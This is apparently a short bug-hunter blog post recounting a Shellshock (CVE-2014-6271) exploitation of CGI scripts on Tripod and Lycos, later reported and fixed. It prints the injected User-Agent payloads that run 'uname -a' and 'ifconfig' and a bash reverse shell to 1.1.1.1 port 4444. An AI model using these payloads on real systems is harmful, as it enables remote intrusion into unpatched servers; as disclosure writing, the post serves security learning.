While I was suffering the interwebs my eyes caught a perl script which prints out the environment variables. For example something like this.
use CGI; $cgi = new CGI; for $key ( $cgi->param() ) { $input{$key} = $cgi->param($key); } print qq{Content-type: text/html <html><head></head><body> }; foreach $key (sort (keys %ENV)) { print $key, ' = ', $ENV{$key}, "<br>\n"; } for $key ( keys %input ) { print $key, ' = ', $input{$key}, "<br>\n"; } print qq{<form METHOD=POST><input type="submit" value="Post Request"> <input name="postfield"></form>}; print qq{<form METHOD=GET ><input type="submit" value="Get Request "> <input name="getfield" ></form>}; print qq{</body></html>};
This would output the following.
CONTEXT_DOCUMENT_ROOT : /var/chroot/home/ DOCUMENT_ROOT : /var/chroot/home/ GATEWAY_INTERFACE : CGI/1.1 GD_PHP_HANDLER : x-httpd-php5-3 HTTP_ACCEPT : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 HTTP_ACCEPT_ENCODING : gzip, deflate, sdch HTTP_ACCEPT_LANGUAGE : en-US,en;q=0.8 HTTP_CONNECTION : keep-alive HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 PATH : /usr/local/bin:/usr/bin:/bin
It takes the “User-Agent:” field from the client. We can modify this to whatever input we like. So yeah it was vulnerable to the bash shellshock vulnerability. For example let’s inject “uname –a” and see the output.
GET xxxx HTTP/1.1 Host: perlcgial.tripod.com User-Agent: () { :;}; echo; /bin/bash –c “uname –a” Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Let’s try () { :;}; echo; /bin/bash –c “/sbin/ifconfig”
Since we are arbitrarily injecting code into the bash shell we can get a reverse connection like this.
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/1.1.1.1/4444 0>&1
That is it Game Over 🙂 This is how I owned lycos and tripod. As soon as I found this I reported them and they have already fixed this.
By the way koding.com was too affected by the Shellshock vulnerability.
After reporting them it was too successfully patched
Bonus: Tripod had a reflected XSS vulnerability too.
I don’t know why it gives such a search result 😉
haa haa nice one (y) perl script vulnerability seen eka pattaa 😀